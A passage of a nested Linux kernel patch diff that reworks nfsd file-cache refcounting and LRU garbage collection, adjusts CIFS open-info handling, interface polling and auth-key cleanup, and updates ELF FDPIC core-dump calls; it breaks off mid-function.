+index 9ce5e1f41c26f..069f12cc7634c 100644
+--- a/fs/binfmt_elf_fdpic.c
++++ b/fs/binfmt_elf_fdpic.c
+@@ -1509,7 +1509,7 @@ static int elf_fdpic_core_dump(struct coredump_params *cprm)
+ 	tmp->next = thread_list;
+ 	thread_list = tmp;
+ 
+-	segs = cprm->vma_count + elf_core_extra_phdrs();
++	segs = cprm->vma_count + elf_core_extra_phdrs(cprm);
+ 
+ 	/* for notes section */
+ 	segs++;
+@@ -1555,7 +1555,7 @@ static int elf_fdpic_core_dump(struct coredump_params *cprm)
+ 	dataoff = offset = roundup(offset, ELF_EXEC_PAGESIZE);
+ 
+ 	offset += cprm->vma_data_size;
+-	offset += elf_core_extra_data_size();
++	offset += elf_core_extra_data_size(cprm);
+ 	e_shoff = offset;
+ 
+ 	if (e_phnum == PN_XNUM) {
+diff --git a/fs/cifs/connect.c b/fs/cifs/connect.c
+index 7e7f712f97fd8..fde1c371605a1 100644
+--- a/fs/cifs/connect.c
++++ b/fs/cifs/connect.c
+@@ -2609,11 +2609,14 @@ cifs_get_tcon(struct cifs_ses *ses, struct smb3_fs_context *ctx)
+ 	INIT_LIST_HEAD(&tcon->pending_opens);
+ 	tcon->status = TID_GOOD;
+ 
+-	/* schedule query interfaces poll */
+ 	INIT_DELAYED_WORK(&tcon->query_interfaces,
+ 			  smb2_query_server_interfaces);
+-	queue_delayed_work(cifsiod_wq, &tcon->query_interfaces,
+-			   (SMB_INTERFACE_POLL_INTERVAL * HZ));
++	if (ses->server->dialect >= SMB30_PROT_ID &&
++	    (ses->server->capabilities & SMB2_GLOBAL_CAP_MULTI_CHANNEL)) {
++		/* schedule query interfaces poll */
++		queue_delayed_work(cifsiod_wq, &tcon->query_interfaces,
++				   (SMB_INTERFACE_POLL_INTERVAL * HZ));
++	}
+ 
+ 	spin_lock(&cifs_tcp_ses_lock);
+ 	list_add(&tcon->tcon_list, &ses->tcon_list);
+diff --git a/fs/cifs/link.c b/fs/cifs/link.c
+index bd374feeccaa1..a5a097a699837 100644
+--- a/fs/cifs/link.c
++++ b/fs/cifs/link.c
+@@ -428,6 +428,7 @@ smb3_create_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
+ 	oparms.disposition = FILE_CREATE;
+ 	oparms.fid = &fid;
+ 	oparms.reconnect = false;
++	oparms.mode = 0644;
+ 
+ 	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL,
+ 		       NULL, NULL);
+diff --git a/fs/cifs/smb1ops.c b/fs/cifs/smb1ops.c
+index 50480751e521c..4cb364454e130 100644
+--- a/fs/cifs/smb1ops.c
++++ b/fs/cifs/smb1ops.c
+@@ -562,17 +562,20 @@ static int cifs_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
+ 	if ((rc == -EOPNOTSUPP) || (rc == -EINVAL)) {
+ 		rc = SMBQueryInformation(xid, tcon, full_path, &fi, cifs_sb->local_nls,
+ 					 cifs_remap(cifs_sb));
+-		if (!rc)
+-			move_cifs_info_to_smb2(&data->fi, &fi);
+ 		*adjustTZ = true;
+ 	}
+ 
+-	if (!rc && (le32_to_cpu(fi.Attributes) & ATTR_REPARSE)) {
++	if (!rc) {
+ 		int tmprc;
+ 		int oplock = 0;
+ 		struct cifs_fid fid;
+ 		struct cifs_open_parms oparms;
+ 
++		move_cifs_info_to_smb2(&data->fi, &fi);
++
++		if (!(le32_to_cpu(fi.Attributes) & ATTR_REPARSE))
++			return 0;
++
+ 		oparms.tcon = tcon;
+ 		oparms.cifs_sb = cifs_sb;
+ 		oparms.desired_access = FILE_READ_ATTRIBUTES;
+@@ -716,17 +719,25 @@ cifs_mkdir_setinfo(struct inode *inode, const char *full_path,
+ static int cifs_open_file(const unsigned int xid, struct cifs_open_parms *oparms, __u32 *oplock,
+ 			  void *buf)
+ {
+-	FILE_ALL_INFO *fi = buf;
++	struct cifs_open_info_data *data = buf;
++	FILE_ALL_INFO fi = {};
++	int rc;
+ 
+ 	if (!(oparms->tcon->ses->capabilities & CAP_NT_SMBS))
+-		return SMBLegacyOpen(xid, oparms->tcon, oparms->path,
+-				     oparms->disposition,
+-				     oparms->desired_access,
+-				     oparms->create_options,
+-				     &oparms->fid->netfid, oplock, fi,
+-				     oparms->cifs_sb->local_nls,
+-				     cifs_remap(oparms->cifs_sb));
+-	return CIFS_open(xid, oparms, oplock, fi);
++		rc = SMBLegacyOpen(xid, oparms->tcon, oparms->path,
++				   oparms->disposition,
++				   oparms->desired_access,
++				   oparms->create_options,
++				   &oparms->fid->netfid, oplock, &fi,
++				   oparms->cifs_sb->local_nls,
++				   cifs_remap(oparms->cifs_sb));
++	else
++		rc = CIFS_open(xid, oparms, oplock, &fi);
++
++	if (!rc && data)
++		move_cifs_info_to_smb2(&data->fi, &fi);
++
++	return rc;
+ }
+ 
+ static void
+@@ -1050,7 +1061,7 @@ cifs_make_node(unsigned int xid, struct inode *inode,
+ 	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+ 	struct inode *newinode = NULL;
+ 	int rc = -EPERM;
+-	FILE_ALL_INFO *buf = NULL;
++	struct cifs_open_info_data buf = {};
+ 	struct cifs_io_parms io_parms;
+ 	__u32 oplock = 0;
+ 	struct cifs_fid fid;
+@@ -1082,14 +1093,14 @@ cifs_make_node(unsigned int xid, struct inode *inode,
+ 					    cifs_sb->local_nls,
+ 					    cifs_remap(cifs_sb));
+ 		if (rc)
+-			goto out;
++			return rc;
+ 
+ 		rc = cifs_get_inode_info_unix(&newinode, full_path,
+ 					      inode->i_sb, xid);
+ 
+ 		if (rc == 0)
+ 			d_instantiate(dentry, newinode);
+-		goto out;
++		return rc;
+ 	}
+ 
+ 	/*
+@@ -1097,19 +1108,13 @@ cifs_make_node(unsigned int xid, struct inode *inode,
+ 	 * support block and char device (no socket & fifo)
+ 	 */
+ 	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UNX_EMUL))
+-		goto out;
++		return rc;
+ 
+ 	if (!S_ISCHR(mode) && !S_ISBLK(mode))
+-		goto out;
++		return rc;
+ 
+ 	cifs_dbg(FYI, "sfu compat create special file\n");
+ 
+-	buf = kmalloc(sizeof(FILE_ALL_INFO), GFP_KERNEL);
+-	if (buf == NULL) {
+-		rc = -ENOMEM;
+-		goto out;
+-	}
+-
+ 	oparms.tcon = tcon;
+ 	oparms.cifs_sb = cifs_sb;
+ 	oparms.desired_access = GENERIC_WRITE;
+@@ -1124,21 +1129,21 @@ cifs_make_node(unsigned int xid, struct inode *inode,
+ 		oplock = REQ_OPLOCK;
+ 	else
+ 		oplock = 0;
+-	rc = tcon->ses->server->ops->open(xid, &oparms, &oplock, buf);
++	rc = tcon->ses->server->ops->open(xid, &oparms, &oplock, &buf);
+ 	if (rc)
+-		goto out;
++		return rc;
+ 
+ 	/*
+ 	 * BB Do not bother to decode buf since no local inode yet to put
+ 	 * timestamps in, but we can reuse it safely.
+ 	 */
+ 
+-	pdev = (struct win_dev *)buf;
++	pdev = (struct win_dev *)&buf.fi;
+ 	io_parms.pid = current->tgid;
+ 	io_parms.tcon = tcon;
+ 	io_parms.offset = 0;
+ 	io_parms.length = sizeof(struct win_dev);
+-	iov[1].iov_base = buf;
++	iov[1].iov_base = &buf.fi;
+ 	iov[1].iov_len = sizeof(struct win_dev);
+ 	if (S_ISCHR(mode)) {
+ 		memcpy(pdev->type, "IntxCHR", 8);
+@@ -1157,8 +1162,8 @@ cifs_make_node(unsigned int xid, struct inode *inode,
+ 	d_drop(dentry);
+ 
+ 	/* FIXME: add code here to set EAs */
+-out:
+-	kfree(buf);
++
++	cifs_free_open_info(&buf);
+ 	return rc;
+ }
+ 
+diff --git a/fs/cifs/smb2pdu.c b/fs/cifs/smb2pdu.c
+index a5695748a89b1..4ac5b1bfaf781 100644
+--- a/fs/cifs/smb2pdu.c
++++ b/fs/cifs/smb2pdu.c
+@@ -1479,8 +1479,11 @@ SMB2_auth_kerberos(struct SMB2_sess_data *sess_data)
+ out_put_spnego_key:
+ 	key_invalidate(spnego_key);
+ 	key_put(spnego_key);
+-	if (rc)
++	if (rc) {
+ 		kfree_sensitive(ses->auth_key.response);
++		ses->auth_key.response = NULL;
++		ses->auth_key.len = 0;
++	}
+ out:
+ 	sess_data->result = rc;
+ 	sess_data->func = NULL;
+diff --git a/fs/nfsd/filecache.c b/fs/nfsd/filecache.c
+index ec3fceb92236e..ea6fb0e6b1655 100644
+--- a/fs/nfsd/filecache.c
++++ b/fs/nfsd/filecache.c
+@@ -33,7 +33,6 @@ static DEFINE_PER_CPU(unsigned long, nfsd_file_cache_hits);
+ static DEFINE_PER_CPU(unsigned long, nfsd_file_acquisitions);
+ static DEFINE_PER_CPU(unsigned long, nfsd_file_releases);
+ static DEFINE_PER_CPU(unsigned long, nfsd_file_total_age);
+-static DEFINE_PER_CPU(unsigned long, nfsd_file_pages_flushed);
+ static DEFINE_PER_CPU(unsigned long, nfsd_file_evictions);
+ 
+ struct nfsd_fcache_disposal {
+@@ -63,6 +62,7 @@ struct nfsd_file_lookup_key {
+ 	struct net			*net;
+ 	const struct cred		*cred;
+ 	unsigned char			need;
++	bool				gc;
+ 	enum nfsd_file_lookup_type	type;
+ };
+ 
+@@ -162,6 +162,8 @@ static int nfsd_file_obj_cmpfn(struct rhashtable_compare_arg *arg,
+ 			return 1;
+ 		if (!nfsd_match_cred(nf->nf_cred, key->cred))
+ 			return 1;
++		if (!!test_bit(NFSD_FILE_GC, &nf->nf_flags) != key->gc)
++			return 1;
+ 		if (test_bit(NFSD_FILE_HASHED, &nf->nf_flags) == 0)
+ 			return 1;
+ 		break;
+@@ -297,56 +299,28 @@ nfsd_file_alloc(struct nfsd_file_lookup_key *key, unsigned int may)
+ 		nf->nf_flags = 0;
+ 		__set_bit(NFSD_FILE_HASHED, &nf->nf_flags);
+ 		__set_bit(NFSD_FILE_PENDING, &nf->nf_flags);
++		if (key->gc)
++			__set_bit(NFSD_FILE_GC, &nf->nf_flags);
+ 		nf->nf_inode = key->inode;
+-		/* nf_ref is pre-incremented for hash table */
+-		refcount_set(&nf->nf_ref, 2);
++		refcount_set(&nf->nf_ref, 1);
+ 		nf->nf_may = key->need;
+ 		nf->nf_mark = NULL;
+ 	}
+ 	return nf;
+ }
+ 
+-static bool
+-nfsd_file_free(struct nfsd_file *nf)
+-{
+-	s64 age = ktime_to_ms(ktime_sub(ktime_get(), nf->nf_birthtime));
+-	bool flush = false;
+-
+-	this_cpu_inc(nfsd_file_releases);
+-	this_cpu_add(nfsd_file_total_age, age);
+-
+-	trace_nfsd_file_put_final(nf);
+-	if (nf->nf_mark)
+-		nfsd_file_mark_put(nf->nf_mark);
+-	if (nf->nf_file) {
+-		get_file(nf->nf_file);
+-		filp_close(nf->nf_file, NULL);
+-		fput(nf->nf_file);
+-		flush = true;
+-	}
+-
+-	/*
+-	 * If this item is still linked via nf_lru, that's a bug.
+-	 * WARN and leak it to preserve system stability.
+-	 */
+-	if (WARN_ON_ONCE(!list_empty(&nf->nf_lru)))
+-		return flush;
+-
+-	call_rcu(&nf->nf_rcu, nfsd_file_slab_free);
+-	return flush;
+-}
+-
+-static bool
+-nfsd_file_check_writeback(struct nfsd_file *nf)
++static void
++nfsd_file_fsync(struct nfsd_file *nf)
+ {
+ 	struct file *file = nf->nf_file;
+-	struct address_space *mapping;
++	int ret;
+ 
+ 	if (!file || !(file->f_mode & FMODE_WRITE))
+-		return false;
+-	mapping = file->f_mapping;
+-	return mapping_tagged(mapping, PAGECACHE_TAG_DIRTY) ||
+-		mapping_tagged(mapping, PAGECACHE_TAG_WRITEBACK);
++		return;
++	ret = vfs_fsync(file, 1);
++	trace_nfsd_file_fsync(nf, ret);
++	if (ret)
++		nfsd_reset_write_verifier(net_generic(nf->nf_net, nfsd_net_id));
+ }
+ 
+ static int
+@@ -359,31 +333,6 @@ nfsd_file_check_write_error(struct nfsd_file *nf)
+ 	return filemap_check_wb_err(file->f_mapping, READ_ONCE(file->f_wb_err));
+ }
+ 
+-static void
+-nfsd_file_flush(struct nfsd_file *nf)
+-{
+-	struct file *file = nf->nf_file;
+-
+-	if (!file || !(file->f_mode & FMODE_WRITE))
+-		return;
+-	this_cpu_add(nfsd_file_pages_flushed, file->f_mapping->nrpages);
+-	if (vfs_fsync(file, 1) != 0)
+-		nfsd_reset_write_verifier(net_generic(nf->nf_net, nfsd_net_id));
+-}
+-
+-static void nfsd_file_lru_add(struct nfsd_file *nf)
+-{
+-	set_bit(NFSD_FILE_REFERENCED, &nf->nf_flags);
+-	if (list_lru_add(&nfsd_file_lru, &nf->nf_lru))
+-		trace_nfsd_file_lru_add(nf);
+-}
+-
+-static void nfsd_file_lru_remove(struct nfsd_file *nf)
+-{
+-	if (list_lru_del(&nfsd_file_lru, &nf->nf_lru))
+-		trace_nfsd_file_lru_del(nf);
+-}
+-
+ static void
+ nfsd_file_hash_remove(struct nfsd_file *nf)
+ {
+@@ -406,60 +355,76 @@ nfsd_file_unhash(struct nfsd_file *nf)
+ }
+ 
+ static void
+-nfsd_file_unhash_and_dispose(struct nfsd_file *nf, struct list_head *dispose)
++nfsd_file_free(struct nfsd_file *nf)
+ {
+-	trace_nfsd_file_unhash_and_dispose(nf);
+-	if (nfsd_file_unhash(nf)) {
+-		/* caller must call nfsd_file_dispose_list() later */
+-		nfsd_file_lru_remove(nf);
+-		list_add(&nf->nf_lru, dispose);
++	s64 age = ktime_to_ms(ktime_sub(ktime_get(), nf->nf_birthtime));
++
++	trace_nfsd_file_free(nf);
++
++	this_cpu_inc(nfsd_file_releases);
++	this_cpu_add(nfsd_file_total_age, age);
++
++	nfsd_file_unhash(nf);
++
++	/*
++	 * We call fsync here in order to catch writeback errors. It's not
++	 * strictly required by the protocol, but an nfsd_file could get
++	 * evicted from the cache before a COMMIT comes in. If another
++	 * task were to open that file in the interim and scrape the error,
++	 * then the client may never see it. By calling fsync here, we ensure
++	 * that writeback happens before the entry is freed, and that any
++	 * errors reported result in the write verifier changing.
++	 */
++	nfsd_file_fsync(nf);
++
++	if (nf->nf_mark)
++		nfsd_file_mark_put(nf->nf_mark);
++	if (nf->nf_file) {
++		get_file(nf->nf_file);
++		filp_close(nf->nf_file, NULL);
++		fput(nf->nf_file);
+ 	}
++
++	/*
++	 * If this item is still linked via nf_lru, that's a bug.
++	 * WARN and leak it to preserve system stability.
++	 */
++	if (WARN_ON_ONCE(!list_empty(&nf->nf_lru)))
++		return;
++
++	call_rcu(&nf->nf_rcu, nfsd_file_slab_free);
+ }
+ 
+-static void
+-nfsd_file_put_noref(struct nfsd_file *nf)
++static bool
++nfsd_file_check_writeback(struct nfsd_file *nf)
+ {
+-	trace_nfsd_file_put(nf);
++	struct file *file = nf->nf_file;
++	struct address_space *mapping;
+ 
+-	if (refcount_dec_and_test(&nf->nf_ref)) {
+-		WARN_ON(test_bit(NFSD_FILE_HASHED, &nf->nf_flags));
+-		nfsd_file_lru_remove(nf);
+-		nfsd_file_free(nf);
+-	}
++	if (!file || !(file->f_mode & FMODE_WRITE))
++		return false;
++	mapping = file->f_mapping;
++	return mapping_tagged(mapping, PAGECACHE_TAG_DIRTY) ||
++		mapping_tagged(mapping, PAGECACHE_TAG_WRITEBACK);
+ }
+ 
+-void
+-nfsd_file_put(struct nfsd_file *nf)
++static bool nfsd_file_lru_add(struct nfsd_file *nf)
+ {
+-	might_sleep();
+-
+-	nfsd_file_lru_add(nf);
+-	if (test_bit(NFSD_FILE_HASHED, &nf->nf_flags) == 0) {
+-		nfsd_file_flush(nf);
+-		nfsd_file_put_noref(nf);
+-	} else if (nf->nf_file) {
+-		nfsd_file_put_noref(nf);
+-		nfsd_file_schedule_laundrette();
+-	} else
+-		nfsd_file_put_noref(nf);
++	set_bit(NFSD_FILE_REFERENCED, &nf->nf_flags);
++	if (list_lru_add(&nfsd_file_lru, &nf->nf_lru)) {
++		trace_nfsd_file_lru_add(nf);
++		return true;
++	}
++	return false;
+ }
+ 
+-/**
+- * nfsd_file_close - Close an nfsd_file
+- * @nf: nfsd_file to close
+- *
+- * If this is the final reference for @nf, free it immediately.
+- * This reflects an on-the-wire CLOSE or DELEGRETURN into the
+- * VFS and exported filesystem.
+- */
+-void nfsd_file_close(struct nfsd_file *nf)
++static bool nfsd_file_lru_remove(struct nfsd_file *nf)
+ {
+-	nfsd_file_put(nf);
+-	if (refcount_dec_if_one(&nf->nf_ref)) {
+-		nfsd_file_unhash(nf);
+-		nfsd_file_lru_remove(nf);
+-		nfsd_file_free(nf);
++	if (list_lru_del(&nfsd_file_lru, &nf->nf_lru)) {
++		trace_nfsd_file_lru_del(nf);
++		return true;
+ 	}
++	return false;
+ }
+ 
+ struct nfsd_file *
+@@ -470,36 +435,60 @@ nfsd_file_get(struct nfsd_file *nf)
+ 	return NULL;
+ }
+ 
+-static void
+-nfsd_file_dispose_list(struct list_head *dispose)
++/**
++ * nfsd_file_put - put the reference to a nfsd_file
++ * @nf: nfsd_file of which to put the reference
++ *
++ * Put a reference to a nfsd_file. In the non-GC case, we just put the
++ * reference immediately. In the GC case, if the reference would be
++ * the last one, the put it on the LRU instead to be cleaned up later.
++ */
++void
++nfsd_file_put(struct nfsd_file *nf)
+ {
+-	struct nfsd_file *nf;
++	might_sleep();
++	trace_nfsd_file_put(nf);
+ 
+-	while(!list_empty(dispose)) {
+-		nf = list_first_entry(dispose, struct nfsd_file, nf_lru);
+-		list_del_init(&nf->nf_lru);
+-		nfsd_file_flush(nf);
+-		nfsd_file_put_noref(nf);
++	if (test_bit(NFSD_FILE_GC, &nf->nf_flags) &&
++	    test_bit(NFSD_FILE_HASHED, &nf->nf_flags)) {
++		/*
++		 * If this is the last reference (nf_ref == 1), then try to
++		 * transfer it to the LRU.
++		 */
++		if (refcount_dec_not_one(&nf->nf_ref))
++			return;
++
++		/* Try to add it to the LRU.  If that fails, decrement. */
++		if (nfsd_file_lru_add(nf)) {
++			/* If it's still hashed, we're done */
++			if (test_bit(NFSD_FILE_HASHED, &nf->nf_flags)) {
++				nfsd_file_schedule_laundrette();
++				return;
++			}
++
++			/*
++			 * We're racing with unhashing, so try to remove it from
++			 * the LRU. If removal fails, then someone else already
++			 * has our reference.
++			 */
++			if (!nfsd_file_lru_remove(nf))
++				return;
++		}
+ 	}
++	if (refcount_dec_and_test(&nf->nf_ref))
++		nfsd_file_free(nf);
+ }
+ 
+ static void
+-nfsd_file_dispose_list_sync(struct list_head *dispose)
++nfsd_file_dispose_list(struct list_head *dispose)
+ {
+-	bool flush = false;
+ 	struct nfsd_file *nf;
+ 
+-	while(!list_empty(dispose)) {
++	while (!list_empty(dispose)) {
+ 		nf = list_first_entry(dispose, struct nfsd_file, nf_lru);
+ 		list_del_init(&nf->nf_lru);
+-		nfsd_file_flush(nf);
+-		if (!refcount_dec_and_test(&nf->nf_ref))
+-			continue;
+-		if (nfsd_file_free(nf))
+-			flush = true;
++		nfsd_file_free(nf);
+ 	}
+-	if (flush)
+-		flush_delayed_fput();
+ }
+ 
+ static void
+@@ -569,21 +558,8 @@ nfsd_file_lru_cb(struct list_head *item, struct list_lru_one *lru,
+ 	struct list_head *head = arg;
+ 	struct nfsd_file *nf = list_entry(item, struct nfsd_file, nf_lru);
+ 
+-	/*
+-	 * Do a lockless refcount check. The hashtable holds one reference, so
+-	 * we look to see if anything else has a reference, or if any have
+-	 * been put since the shrinker last ran. Those don't get unhashed and
+-	 * released.
+-	 *
+-	 * Note that in the put path, we set the flag and then decrement the
+-	 * counter. Here we check the counter and then test and clear the flag.
+-	 * That order is deliberate to ensure that we can do this locklessly.
+-	 */
+-	if (refcount_read(&nf->nf_ref) > 1) {
+-		list_lru_isolate(lru, &nf->nf_lru);
+-		trace_nfsd_file_gc_in_use(nf);
+-		return LRU_REMOVED;
+-	}
++	/* We should only be dealing with GC entries here */
++	WARN_ON_ONCE(!test_bit(NFSD_FILE_GC, &nf->nf_flags));
+ 
+ 	/*
+ 	 * Don't throw out files that are still undergoing I/O or
+@@ -594,40 +570,30 @@ nfsd_file_lru_cb(struct list_head *item, struct list_lru_one *lru,
+ 		return LRU_SKIP;
+ 	}
+ 
++	/* If it was recently added to the list, skip it */
+ 	if (test_and_clear_bit(NFSD_FILE_REFERENCED, &nf->nf_flags)) {
+ 		trace_nfsd_file_gc_referenced(nf);
+ 		return LRU_ROTATE;
+ 	}
+ 
+-	if (!test_and_clear_bit(NFSD_FILE_HASHED, &nf->nf_flags)) {
+-		trace_nfsd_file_gc_hashed(nf);
+-		return LRU_SKIP;
++	/*
++	 * Put the reference held on behalf of the LRU. If it wasn't the last
++	 * one, then just remove it from the LRU and ignore it.
++	 */
++	if (!refcount_dec_and_test(&nf->nf_ref)) {
++		trace_nfsd_file_gc_in_use(nf);
++		list_lru_isolate(lru, &nf->nf_lru);
++		return LRU_REMOVED;
+ 	}
+ 
++	/* Refcount went to zero. Unhash it and queue it to the dispose list */
++	nfsd_file_unhash(nf);
+ 	list_lru_isolate_move(lru, &nf->nf_lru, head);
+ 	this_cpu_inc(nfsd_file_evictions);
+ 	trace_nfsd_file_gc_disposed(nf);
+ 	return LRU_REMOVED;
+ }
+ 
+-/*
+- * Unhash items on @dispose immediately, then queue them on the
+- * disposal workqueue to finish releasing them in the background.
+- *
+- * cel: Note that between the time list_lru_shrink_walk runs and
+- * now, these items are in the hash table but marked unhashed.
+- * Why release these outside of lru_cb ? There's no lock ordering
+- * problem since lru_cb currently takes no lock.
+- */
+-static void nfsd_file_gc_dispose_list(struct list_head *dispose)
+-{
+-	struct nfsd_file *nf;
+-
+-	list_for_each_entry(nf, dispose, nf_lru)
+-		nfsd_file_hash_remove(nf);
+-	nfsd_file_dispose_list_delayed(dispose);
+-}
+-
+ static void
+ nfsd_file_gc(void)
+ {
+@@ -637,7 +603,7 @@ nfsd_file_gc(void)
+ 	ret = list_lru_walk(&nfsd_file_lru, nfsd_file_lru_cb,
+ 			    &dispose, list_lru_count(&nfsd_file_lru));
+ 	trace_nfsd_file_gc_removed(ret, list_lru_count(&nfsd_file_lru));
+-	nfsd_file_gc_dispose_list(&dispose);
++	nfsd_file_dispose_list_delayed(&dispose);
+ }
+ 
+ static void
+@@ -662,7 +628,7 @@ nfsd_file_lru_scan(struct shrinker *s, struct shrink_control *sc)
+ 	ret = list_lru_shrink_walk(&nfsd_file_lru, sc,
+ 				   nfsd_file_lru_cb, &dispose);
+ 	trace_nfsd_file_shrinker_removed(ret, list_lru_count(&nfsd_file_lru));
+-	nfsd_file_gc_dispose_list(&dispose);
++	nfsd_file_dispose_list_delayed(&dispose);
+ 	return ret;
+ }
+ 
+@@ -672,72 +638,111 @@ static struct shrinker	nfsd_file_shrinker = {
+ 	.seeks = 1,
+ };
+ 
+-/*
+- * Find all cache items across all net namespaces that match @inode and
+- * move them to @dispose. The lookup is atomic wrt nfsd_file_acquire().
++/**
++ * nfsd_file_queue_for_close: try to close out any open nfsd_files for an inode
++ * @inode:   inode on which to close out nfsd_files
++ * @dispose: list on which to gather nfsd_files to close out
++ *
++ * An nfsd_file represents a struct file being held open on behalf of nfsd. An
++ * open file however can block other activity (such as leases), or cause
++ * undesirable behavior (e.g. spurious silly-renames when reexporting NFS).
++ *
++ * This function is intended to find open nfsd_files when this sort of
++ * conflicting access occurs and then attempt to close those files out.
++ *
++ * Populates the dispose list with entries that have already had their
++ * refcounts go to zero. The actual free of an nfsd_file can be expensive,
++ * so we leave it up to the caller whether it wants to wait or not.
+  */
+-static unsigned int
+-__nfsd_file_close_inode(struct inode *inode, struct list_head *dispose)
++static void
++nfsd_file_queue_for_close(struct inode *inode, struct list_head *dispose)
+ {
+ 	struct nfsd_file_lookup_key key = {
+ 		.type	= NFSD_FILE_KEY_INODE,
+ 		.inode	= inode,
+ 	};
+-	unsigned int count = 0;
+ 	struct nfsd_file *nf;
+ 
+ 	rcu_read_lock();
+ 	do {
++		int decrement = 1;
++
+ 		nf = rhashtable_lookup(&nfsd_file_rhash_tbl, &key,
+ 				       nfsd_file_rhash_params);
+ 		if (!nf)
+ 			break;
+-		nfsd_file_unhash_and_dispose(nf, dispose);
+-		count++;
++
++		/* If we raced with someone else unhashing, ignore it */
++		if (!nfsd_file_unhash(nf))
++			continue;
++
++		/* If we can't get a reference, ignore it */
++		if (!nfsd_file_get(nf))
++			continue;
++
++		/* Extra decrement if we remove from the LRU */
++		if (nfsd_file_lru_remove(nf))
++			++decrement;
++
++		/* If refcount goes to 0, then put on the dispose list */
++		if (refcount_sub_and_test(decrement, &nf->nf_ref)) {
++			list_add(&nf->nf_lru, dispose);
++			trace_nfsd_file_closing(nf);
++		}
+ 	} while (1);
+ 	rcu_read_unlock();
+-	return count;
+ }
+ 
+ /**
+- * nfsd_file_close_inode_sync - attempt to forcibly close a nfsd_file
++ * nfsd_file_close_inode - attempt a delayed close of a nfsd_file
+  * @inode: inode of the file to attempt to remove
+  *
+- * Unhash and put, then flush and fput all cache items associated with @inode.
++ * Close out any open nfsd_files that can be reaped for @inode. The
++ * actual freeing is deferred to the dispose_list_delayed infrastructure.
++ *
++ * This is used by the fsnotify callbacks and setlease notifier.
+  */
+-void
+-nfsd_file_close_inode_sync(struct inode *inode)
++static void
++nfsd_file_close_inode(struct inode *inode)
+ {
+ 	LIST_HEAD(dispose);
+-	unsigned int count;
+ 
+-	count = __nfsd_file_close_inode(inode, &dispose);
+-	trace_nfsd_file_close_inode_sync(inode, count);
+-	nfsd_file_dispose_list_sync(&dispose);
++	nfsd_file_queue_for_close(inode, &dispose);
++	nfsd_file_dispose_list_delayed(&dispose);
+ }
+ 
+ /**
+- * nfsd_file_close_inode - attempt a delayed close of a nfsd_file
++ * nfsd_file_close_inode_sync - attempt to forcibly close a nfsd_file
+  * @inode: inode of the file to attempt to remove
+  *
+- * Unhash and put all cache item associated with @inode.
++ * Close out any open nfsd_files that can be reaped for @inode. The
++ * nfsd_files are closed out synchronously.
++ *
++ * This is called from nfsd_rename and nfsd_unlink to avoid silly-renames
++ * when reexporting NFS.
+  */
+-static void
+-nfsd_file_close_inode(struct inode *inode)
++void
++nfsd_file_close_inode_sync(struct inode *inode)
+ {
++	struct nfsd_file *nf;
+ 	LIST_HEAD(dispose);
+-	unsigned int count;
+ 
+-	count = __nfsd_file_close_inode(inode, &dispose);
+-	trace_nfsd_file_close_inode(inode, count);
+-	nfsd_file_dispose_list_delayed(&dispose);
++	trace_nfsd_file_close(inode);
++
++	nfsd_file_queue_for_close(inode, &dispose);
++	while (!list_empty(&dispose)) {
++		nf = list_first_entry(&dispose, struct nfsd_file, nf_lru);
++		list_del_init(&nf->nf_lru);
++		nfsd_file_free(nf);
++	}
++	flush_delayed_fput();
+ }
+ 
+ /**
+  * nfsd_file_delayed_close - close unused nfsd_files
+  * @work: dummy
+  *
+- * Walk the LRU list and close any entries that have not been used since
++ * Walk the LRU list and destroy any entries that have not been used since
+  * the last scan.
+  */
+ static void
+@@ -759,7 +764,7 @@ nfsd_file_lease_notifier_call(struct notifier_block *nb, unsigned long arg,
+ 
+ 	/* Only close files for F_SETLEASE leases */
+ 	if (fl->fl_flags & FL_LEASE)
+-		nfsd_file_close_inode_sync(file_inode(fl->fl_file));
++		nfsd_file_close_inode(file_inode(fl->fl_file));
+ 	return 0;
+ }
+ 
+@@ -880,6 +885,13 @@ out_err:
+ 	goto out;
+ }
+ 
++/**
++ * __nfsd_file_cache_purge: clean out the cache for shutdown
++ * @net: net-namespace to shut down the cache (may be NULL)
++ *
++ * Walk the nfsd_file cache and close out any that match @net. If @net is NULL,
++ * then close out everything. Called when an nfsd instance is being shut down.
++ */
+ static void
+ __nfsd_file_cache_purge(struct net *net)
+ {
+@@ -893,8 +905,11 @@ __nfsd_file_cache_purge(struct net *net)
+ 
+ 		nf = rhashtable_walk_next(&iter);
+ 		while (!IS_ERR_OR_NULL(nf)) {
+-			if (!net || nf->nf_net == net)
+-				nfsd_file_unhash_and_dispose(nf, &dispose);
++			if (!net || nf->nf_net == net) {
++				nfsd_file_unhash(nf);
++				nfsd_file_lru_remove(nf);
++				list_add(&nf->nf_lru, &dispose);
++			}
+ 			nf = rhashtable_walk_next(&iter);
+ 		}
+ 
+@@ -1000,7 +1015,6 @@ nfsd_file_cache_shutdown(void)
+ 		per_cpu(nfsd_file_acquisitions, i) = 0;
+ 		per_cpu(nfsd_file_releases, i) = 0;
+ 		per_cpu(nfsd_file_total_age, i) = 0;
+-		per_cpu(nfsd_file_pages_flushed, i) = 0;
+ 		per_cpu(nfsd_file_evictions, i) = 0;
+ 	}
+ }
+@@ -1034,12 +1048,14 @@ nfsd_file_is_cached(struct inode *inode)
+ 
+ static __be32
+ nfsd_file_do_acquire(struct svc_rqst *rqstp, struct svc_fh *fhp,
+-		     unsigned int may_flags, struct nfsd_file **pnf, bool open)
++		     unsigned int may_flags, struct file *file,
++		     struct nfsd_file **pnf, bool want_gc)
+ {
+ 	struct nfsd_file_lookup_key key = {
+ 		.type	= NFSD_FILE_KEY_FULL,
+ 		.need	= may_flags & NFSD_FILE_MAY_MASK,
+ 		.net	= SVC_NET(rqstp),
++		.gc	= want_gc,
+ 	};
+ 	bool open_retry = true;
+ 	struct nfsd_file *nf;
+@@ -1060,8 +1076,12 @@ retry:
+ 	if (nf)
+ 		nf = nfsd_file_get(nf);
+ 	rcu_read_unlock();
+-	if (nf)
++
++	if (nf) {
++		if (nfsd_file_lru_remove(nf))
++			WARN_ON_ONCE(refcount_dec_and_test(&nf->nf_ref));
+ 		goto wait_for_construction;
++	}
+ 
+ 	nf = nfsd_file_alloc(&key, may_flags);
+ 	if (!nf) {
+@@ -1094,55 +1114,81 @@ wait_for_construction:
+ 			goto out;
+ 		}
+ 		open_retry = false;
+-		nfsd_file_put_noref(nf);
